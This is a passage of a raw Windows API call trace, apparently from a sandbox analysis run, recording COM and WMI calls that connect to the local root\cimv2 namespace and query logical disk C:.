returned 0x0 [0167.217] WbemDefPath:IUnknown:Release (This=0x60275f0) returned 0x0 [0167.217] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x6030b00) returned 0x0 [0167.217] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0167.217] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0167.217] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0167.217] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0167.217] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0x66ce318) returned 0x0 [0167.217] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce318, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0167.217] WbemDefPath:IUnknown:Release (This=0x66ce318) returned 0x3 [0167.217] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0167.217] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0167.217] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0167.217] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0167.217] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0167.218] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0167.218] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0167.218] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x6030b00) returned 0x0 [0167.218] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0167.218] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0167.218] WbemDefPath:IWbemPath:SetText (This=0x6030b00, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.218] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0167.218] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0167.218] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.218] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0167.218] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0167.218] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0167.531] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0167.531] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0167.531] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0167.531] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0167.531] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.531] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0167.531] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0167.531] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0167.531] IUnknown:Release (This=0xb51e34) returned 0x1 [0167.532] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x60276e0) returned 0x0 [0167.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0167.533] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60276e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x6030c50) returned 0x0 [0167.533] WbemDefPath:IUnknown:Release (This=0x60276e0) returned 0x0 [0167.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x6030c50) returned 0x0 [0167.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0167.533] WbemDefPath:IUnknown:AddRef (This=0x6030c50) returned 0x3 [0167.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0167.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 [0167.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0x66ce428) returned 0x0 [0167.533] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce428, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0167.533] WbemDefPath:IUnknown:Release (This=0x66ce428) returned 0x3 [0167.533] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0167.533] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0167.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0167.533] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x2 [0167.534] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x1 [0167.534] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0167.534] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0167.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x6030c50) returned 0x0 [0167.534] WbemDefPath:IUnknown:AddRef (This=0x6030c50) returned 0x3 [0167.534] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x2 [0167.534] WbemDefPath:IWbemPath:SetText (This=0x6030c50, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0167.534] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0167.534] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0167.534] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.534] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0167.534] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: pAptType=0x949e978*=1) returned 0x0 [0167.534] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0167.534] IUnknown:Release (This=0xb51e34) returned 0x1 [0167.535] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x6023b40) returned 0x0 [0167.535] WbemLocator:IUnknown:QueryInterface (in: This=0x6023b40, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0167.535] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023b40, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x60276f0) returned 0x0 [0167.535] WbemLocator:IUnknown:Release (This=0x6023b40) returned 0x0 [0167.535] WbemLocator:IUnknown:QueryInterface (in: This=0x60276f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x60276f0) returned 0x0 [0167.535] WbemLocator:IUnknown:QueryInterface (in: This=0x60276f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0167.535] WbemLocator:IUnknown:AddRef (This=0x60276f0) returned 0x3 [0167.535] WbemLocator:IUnknown:QueryInterface (in: This=0x60276f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0167.535] WbemLocator:IUnknown:QueryInterface (in: This=0x60276f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0167.535] WbemLocator:IUnknown:QueryInterface (in: This=0x60276f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0167.535] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0167.536] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0167.536] WbemLocator:IUnknown:QueryInterface (in: This=0x60276f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0167.536] WbemLocator:IUnknown:Release (This=0x60276f0) returned 0x2 [0167.536] WbemLocator:IUnknown:Release (This=0x60276f0) returned 0x1 [0167.536] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0167.536] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0167.536] WbemLocator:IUnknown:QueryInterface (in: This=0x60276f0, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x60276f0) returned 0x0 [0167.536] WbemLocator:IUnknown:AddRef (This=0x60276f0) returned 0x3 [0167.536] WbemLocator:IUnknown:Release (This=0x60276f0) returned 0x2 [0167.536] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0167.536] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0167.536] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0167.536] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x6027700) returned 0x0 [0167.536] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027700, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x60332c4) returned 0x0 [0168.821] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0x66b289c) returned 0x0 [0168.821] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66b289c, pProxy=0x60332c4, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0168.821] WbemLocator:IUnknown:Release (This=0x66b289c) returned 0x1 [0168.821] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0x66b28bc) returned 0x0 [0168.821] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0x66b289c) returned 0x0 [0168.822] WbemLocator:IClientSecurity:SetBlanket (This=0x66b289c, pProxy=0x60332c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0168.822] WbemLocator:IUnknown:Release (This=0x66b289c) returned 0x2 [0168.822] WbemLocator:IUnknown:Release (This=0x66b28bc) returned 0x1 [0168.822] CoTaskMemFree (pv=0xbd4a08) [0168.822] WbemLocator:IUnknown:Release (This=0x6027700) returned 0x0 [0168.822] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0x66b28bc) returned 0x0 [0168.822] WbemLocator:IUnknown:QueryInterface (in: This=0x66b28bc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0169.510] WbemLocator:IUnknown:QueryInterface (in: This=0x66b28bc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0169.513] WbemLocator:IUnknown:AddRef (This=0x66b28bc) returned 0x3 [0169.513] WbemLocator:IUnknown:QueryInterface (in: This=0x66b28bc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0169.514] WbemLocator:IUnknown:QueryInterface (in: This=0x66b28bc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0169.518] WbemLocator:IUnknown:QueryInterface (in: This=0x66b28bc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0x66b281c) returned 0x0 [0169.518] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66b281c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0169.518] WbemLocator:IUnknown:Release (This=0x66b281c) returned 0x3 [0169.518] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0169.518] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0169.518] WbemLocator:IUnknown:QueryInterface (in: This=0x66b28bc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0x66b28a4) returned 0x0 [0169.518] WbemLocator:IRpcOptions:Query (in: This=0x66b28a4, pPrx=0x66b28bc, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0169.518] WbemLocator:IUnknown:Release (This=0x66b28a4) returned 0x3 [0169.518] WbemLocator:IUnknown:Release (This=0x66b28bc) returned 0x2 [0169.518] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0169.518] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0169.518] WbemLocator:IUnknown:QueryInterface (in: This=0x66b28bc, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x60332c4) returned 0x0 [0169.518] WbemLocator:IUnknown:AddRef (This=0x60332c4) returned 0x4 [0169.518] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x3 [0169.518] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x2 [0169.518] SysStringLen (param_1=0x0) returned 0x0 [0169.518] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0169.518] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0169.518] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0169.519] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0169.519] WbemLocator:IUnknown:AddRef (This=0x66b28bc) returned 0x3 [0169.519] WbemLocator:IUnknown:QueryInterface (in: This=0x66b28bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0x66b28bc) returned 0x0 [0169.519] WbemLocator:IUnknown:Release (This=0x66b28bc) returned 